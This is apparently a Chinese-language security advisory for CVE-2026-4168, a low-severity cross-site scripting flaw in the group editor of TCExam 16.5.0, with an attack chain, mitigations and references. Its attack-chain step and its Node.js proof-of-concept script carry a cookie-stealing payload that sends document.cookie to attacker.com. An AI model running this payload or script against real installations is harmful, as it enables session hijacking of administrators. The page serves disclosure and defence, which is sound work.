CVE-2026-4168: TCExam 16.5.0 Group Handler跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-4168

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Tecnick TCExam 16.5.0

漏洞概述

CVE-2026-4168是Tecnick TCExam 16.5.0版本中存在的一个跨站脚本（XSS）漏洞。该漏洞位于管理后台的/admin/code/tce_edit_group.php文件中的Group Handler组件。由于程序对用户输入的Name参数缺乏充分的输入验证和输出编码，攻击者可以通过构造恶意脚本来注入任意JavaScript代码。当其他管理员用户访问受污染的页面时，恶意脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或管理员界面篡改等安全问题。由于该漏洞需要高权限用户身份且需要用户交互才能触发，因此CVSS评分仅为2.4，属于低危漏洞。厂商表示在后续版本中已修复该问题，建议用户升级到最新版本以消除安全风险。

技术细节

该漏洞属于存储型XSS（Stored XSS）或反射型XSS，具体类型需进一步验证。漏洞点位于TCExam管理后台的组管理功能模块。攻击者通过以下方式利用该漏洞：

1. 定位到/admin/code/tce_edit_group.php文件
2. 在Group Handler的Name参数中注入恶意JavaScript代码
3. 由于程序未对用户输入进行HTML实体编码，恶意代码被直接存储或反射到页面响应中
4. 当其他管理员用户浏览该页面时，恶意脚本在受害者浏览器中执行

利用条件：
- 攻击者需要拥有TCExam的高权限账户
- 需要诱导其他管理员用户访问包含恶意代码的页面
- 浏览器的同源策略可能被绕过（取决于XSS类型）

攻击者可利用此漏洞窃取管理员会话cookie、篡改页面内容或进行钓鱼攻击。建议对所有用户输入实施严格的输入验证，并使用HTML编码或内容安全策略（CSP）来防止XSS攻击。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标站点使用Tecnick TCExam 16.5.0版本，并定位管理后台入口

STEP 2

Authentication

攻击者获取TCExam的高权限管理员账户凭据（通过社会工程、暴力破解或其他方式）

STEP 3

Payload Crafting

攻击者构造XSS恶意载荷，如<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

STEP 4

Exploitation

通过POST请求向/admin/code/tce_edit_group.php的Name参数注入恶意脚本

STEP 5

Trigger

诱导其他管理员用户访问包含恶意代码的组管理页面

STEP 6

Impact

恶意脚本在受害者浏览器中执行，导致会话劫持、信息窃取或界面篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-4168 PoC - TCExam XSS in Group Handler
// Target: http(s)://<target>/admin/code/tce_edit_group.php
// Method: POST
// Authentication: Requires high-privilege admin account

const axios = require('axios');
const querystring = require('querystring');

// Configuration
const TARGET_URL = 'http://<target>/admin/code/tce_edit_group.php';
const USERNAME = '<admin_username>';
const PASSWORD = '<admin_password>';

// XSS Payload - Cookie Stealer
const XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

async function exploit() {
    try {
        // Step 1: Login to get session cookie
        const loginData = querystring.stringify({
            'user_name': USERNAME,
            'user_pass': PASSWORD,
            'submit': 'Login'
        });

        const loginResponse = await axios.post(
            TARGET_URL.replace('/code/tce_edit_group.php', '/login.php'),
            loginData,
            {
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                maxRedirects: 0,
                validateStatus: (status) => status < 500
            }
        );

        const cookies = loginResponse.headers['set-cookie'];
        console.log('[+] Login attempt completed');

        // Step 2: Send XSS payload via group name parameter
        const exploitData = querystring.stringify({
            'name': XSS_PAYLOAD,
            'submit': 'Save'
        });

        const exploitResponse = await axios.post(
            TARGET_URL,
            exploitData,
            {
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Cookie': cookies
                }
            }
        );

        console.log('[+] XSS payload sent');
        console.log('[+] Target affected if script executes on admin page view');
        console.log('[+] Payload:', XSS_PAYLOAD);

    } catch (error) {
        console.error('[-] Error:', error.message);
    }
}

exploit();

影响范围

Tecnick TCExam <= 16.5.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1）在Web应用防火墙（WAF）中配置XSS防护规则，拦截包含<script>等敏感标签的请求；2）对/admin/code/tce_edit_group.php页面实施访问控制，限制管理员范围；3）使用输入验证库对Name参数进行严格过滤，拒绝特殊字符；4）临时禁用组管理功能，待官方修复后重新启用；5）加强管理员账户安全，使用强密码和会话超时机制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4168
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4168
3 Details https://www.cvedetails.com/cve/CVE-2026-4168/
4 VulDB https://vuldb.com/cve/CVE-2026-4168
5 Link https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/CVE%20Stored%20XSS.md
6 Link https://github.com/tecnickcom/tcexam/tags
7 Link https://vuldb.com/?ctiid.351075
8 Link https://vuldb.com/?id.351075
9 Link https://vuldb.com/?submit.769826